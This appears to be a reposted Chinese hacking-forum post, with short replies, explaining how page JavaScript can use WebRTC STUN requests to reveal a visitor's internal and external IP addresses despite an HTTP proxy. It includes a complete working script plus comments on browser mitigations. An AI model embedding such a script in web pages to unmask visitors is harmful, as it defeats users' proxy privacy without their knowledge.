绕过代理获取访客真实IP
FROM: http://zone.wooyun.org/content/18274
from: https://github.com/diafygi/webrtc-ips
Firefox 和 Chrome 都支持 WebRTC,页面脚本可以借此向 STUN 服务器发起请求,并从返回的候选地址中得到访客的内网和外网 IP。与 XMLHttpRequest 请求不同,STUN 请求不会出现在开发者工具的网络面板中。
演示链接
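//Collect the IPv4 addresses that WebRTC ICE candidate gathering exposes to
//page script, and report each distinct address exactly once.
//
//callback: function(ip), called with a dotted-quad string for every address
//          that has not been reported before.
//Returns nothing; addresses arrive asynchronously through callback.
//
//Why this matters for defenders: candidate gathering talks to the STUN
//server directly, so an HTTP proxy setting does not cover it. Current
//browsers replace host candidates with mDNS ".local" names, which the regex
//below does not match. Where the remaining exposure is unacceptable, WebRTC
//can be restricted with Firefox's media.peerconnection.enabled preference or
//Chrome's WebRtcIPHandling policy.
function getIPs(callback){
    //addresses already reported, keyed by the address string
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){
        //skip non-candidate events
        if(!ice.candidate)
            return;

        //match just the IPv4 address inside the candidate line
        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
        var match = ip_regex.exec(ice.candidate.candidate);

        //a candidate without a dotted-quad address (for example an mDNS
        //".local" host name) is ignored instead of raising a TypeError
        if(match === null)
            return;
        var ip_addr = match[1];

        //remove duplicates: the map is consulted per address, so a repeated
        //candidate does not trigger the callback again
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);
        ip_dups[ip_addr] = true;
    };

    //create a bogus data channel so that the offer has something to negotiate
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){
        //setting the local description starts candidate gathering,
        //which is what sends the stun server request
        pc.setLocalDescription(result, function(){});
    }, function(){});
}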
//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

感谢分享:) 哇哦,是之前鸡鸡说的 开了http代理跟没开一样。原来是这样, 虽然没怎么看懂,收藏 以后慢慢看。 支持中国红客联盟(ihonker.org) 感谢楼主的分享~ 支持中国红客联盟(ihonker.org) 支持,看起来不错呢! 感谢楼主的分享~